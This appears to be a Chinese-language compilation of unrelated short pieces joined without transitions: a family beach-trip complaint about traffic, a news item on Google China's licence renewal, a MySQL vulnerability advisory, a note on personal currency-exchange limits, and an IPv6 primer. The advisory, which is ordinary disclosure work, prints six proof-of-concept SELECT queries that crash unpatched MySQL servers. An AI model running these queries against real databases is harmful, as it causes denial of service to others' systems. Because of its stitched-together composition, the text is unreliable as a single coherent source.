一家人大梅沙游玩记
今天正值周未,带上一家老小去大梅沙看海。
在路上,儿子是欢天喜地的,想去看大海。
可是真没想到,到了海边,走到沙滩上,儿子竟然都不肯下地。
问为什么,说是那沙子叫脏脏的,真是晕到底。
更晕的是,今天周真的很塞车,不是路上塞,而是在大梅沙塞。
到大梅沙时找个车位找了半个多小时,真不亚于华强北找车位。
出来是更惨,出大梅沙到上盐坝高速,走了有一个小时。
唉,看来周未真不能不去大梅沙。
谷歌中国证实其ICP牌照年检已获通过
今日19时10分,谷歌大中华区公关总监王锦红向本报记者证实,谷歌中国ICP牌照年检已通过。
与此同时,Google公司总部也更新了其官方博客,确认了这一消息。Google并未新发博文,而是在6月28日首席法律官大卫•德拉蒙德发表的一篇文章文首,直接以黑体字添加内容:“我们十分高兴地得知,中国政府刚刚通过了我们ICP牌照的年检。我们可以继续为中国用户提供搜索和其他本地产品服务了”。
中国关于互联网管理的法规规定,互联网增值服务运营商必须申请ICP牌照(《中华人民共和国电信与信息服务业务经营许可证》)。该牌照有效期为五年,每年年检一次。
工信部发言人王立建曾对本报记者表示,谷歌今年的年检材料于6月底递交。
MySQL单行子选择远程拒绝服务漏洞
受影响系统:
MySQL AB MySQL < 5.0.37
不受影响系统:
MySQL AB MySQL 5.0.37
描述:
BUGTRAQ ID: 22900
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
MySQL在处理特定畸形请求时存在漏洞,远程攻击者可能利用此漏洞在导致MySQL进程崩溃。
如果MySQL用户在字符串函数中使用了子选择的话,就会调用Item_singlerow_subselect::val_str()。由于无需分类整理单行子选择的结果,因此不会初始化所分配结构st_table中的某些字段,具体来讲是sort->io_cache字段。但如果在查询中使用了ORDER BY,就会对表格运行filesort(),filesort()中的错误处理例程在引用未初始化字段值出现段访问错误:
libmysqld/filesort.cc:
111 FILESORT_INFO table_sort;
(...)
117 memcpy(&table_sort, &table->sort, sizeof(FILESORT_INFO));
120 outfile= table_sort.io_cache;
(..)
269 err:
(..)
276 if (my_b_inited(outfile))
include/my_sys.h:
503 #define my_b_inited(info) (info)->buffer
这可能会触发空指针引用,导致mysqld崩溃。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');
建议:
厂商补丁:
MySQL AB
--------
厂商发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
个人结汇每年限额五万USD
以前我都是在柜台结汇先满五万美元后,可以用网上银行自助结汇,又有五万美元的额度。
这样可以结到每人十万美元的额度。
但今天发现了现在竟然不行了,
打银行电话问了才知道,原来在今年2月24日之后,系统已更新,取消了这一规定,
把网上自助结汇的和柜台的划在一个额度上了。
现在每个人的年结汇总额就只有五万美元了,是包括了所有渠道之和了。
关于IPv6 你必须了解的几件事
你知道你的IPv6是从IPv4升级而来的吗?我们想我们能够给你一些帮助。
IPv6是一个期待以久的互联网主要通讯协议IPv4的升级计划。IPv4使用的是32位地址,可以支持43亿个设备直接接入互联网。IPv6使用的是128位地址,几乎可以支持无限多的设备接入互联网,其支持的数量为:2的128次方。
IPv6备忘单
在将你的网络做好同时支持IPv6和IPv4准备前,你需要知道以下这些基本常识。
IPv6的背景
标准机构互联网工程任务组(Internet Engineering Task Force,IETF)在1998年提出作为IPv4替代方案的IPv6。因为随着互联网的发展,IPv4地址最终将会被用尽。
IPv6的主要目标是增加互联网地址数量,但是协议还增加了一些增强功能,其中包括有自动配置、更容易的网络重新编号和通过IPSec协议内嵌的安全功能。
虽然IPv6部署进程缓慢,但是IPv6的部署还是在2009年取得了一个里程碑。球领先的原生IPv6互联网骨干网和主机托管服务商Hurricane Electric公司和NTTAmerica(日本NTT通信公司在美国的机构)表示,他们的IPv6信息在2009年翻了一倍,同时谷歌也增加了IPv6对搜索、Docs、Gmail和新闻等多个应用的支持。
IPv6的推动活动在2010年仍然在继续。Comcast和Verizon公司宣布了他们对IPv6协议的首次公开测试。
美国联邦政府是IPv6的支持者。联邦政府命令所有的部门在2008年6月30日之前完成一切支持IPv6的有关工作,让他们的骨干网络有能力发送或者接受IPv6地址。在2010年7月份,《联邦采购条例》将被修改为要求所有的部门购买仅支持IPv6的IT系统。
专家们催促美国网络经理们在2012年前将他们的对外网站做好支持IPv6的准备,否则他们的网站与那些具备IPv6能力的访问者将处于将低等级连通状态。
截止至2010年3月份,专家们表示IPv6信息已经占了互联网信息总量的1%。
IPv4地址枯竭
IPv4地址枯竭这一问题自从上世纪八十年代就被注意到了。尽管一种替代IPv4的技术已经被研发出来,但是互联网工程师们在当时还是找到了几种能够保持互联网基于IPv4继续增长的技术。
这些技术包括可将私人网络地址隐藏在一个单一的公共IPv4地址后面的网络地址转换(NAT)技术和可更为有效分配和路由IP地址段的无类别域间路由(CIDR)。CIDR和NAT技术的应用使得互联网工程协会推迟了将互联网基础设施由IPv4升级至IPv6的进程。
目前运营商和企业正在逐渐向IPv6升级。地区性互联网注册机构(RIR)在2010年4月份表示,目前尚未分发出去的IPv4地址数量已经低于8%。
专家预测IPv4地址空间将在2011年或2012年被用尽。
IPv6过渡方案
互联网工程协会已经部署了多个过渡方案,这些过渡方案将帮助网络使用者逐渐由IPv4向IPv6迁移。
其中一个方案被称之为“双堆栈”机制,其允许网络使用者在他们的网络中同时使用IPv4和IPv6。
另一个方案被称之为运营商级网络地址转换(CGN),其允许多客户共享一个单一的公共IPv4地址。
第三个方案被称为“6rd”。该方案已经被法国ISP运营商Free所使用。法国ISP运营商Free通过在基于IPv4 骨干网络的传输中封装IPv6数据包快速地向家庭用户部署了IPv6。
最终用户可以在多种隧道技术中做出选择。这些隧道技术包括“6to4技术”、“Teredo技术”和“ISATAP技术”。虽然这些隧道技术均可以将IPv4网络中传输IPv6数据包,但是这些技术也存在安全方面的疑虑。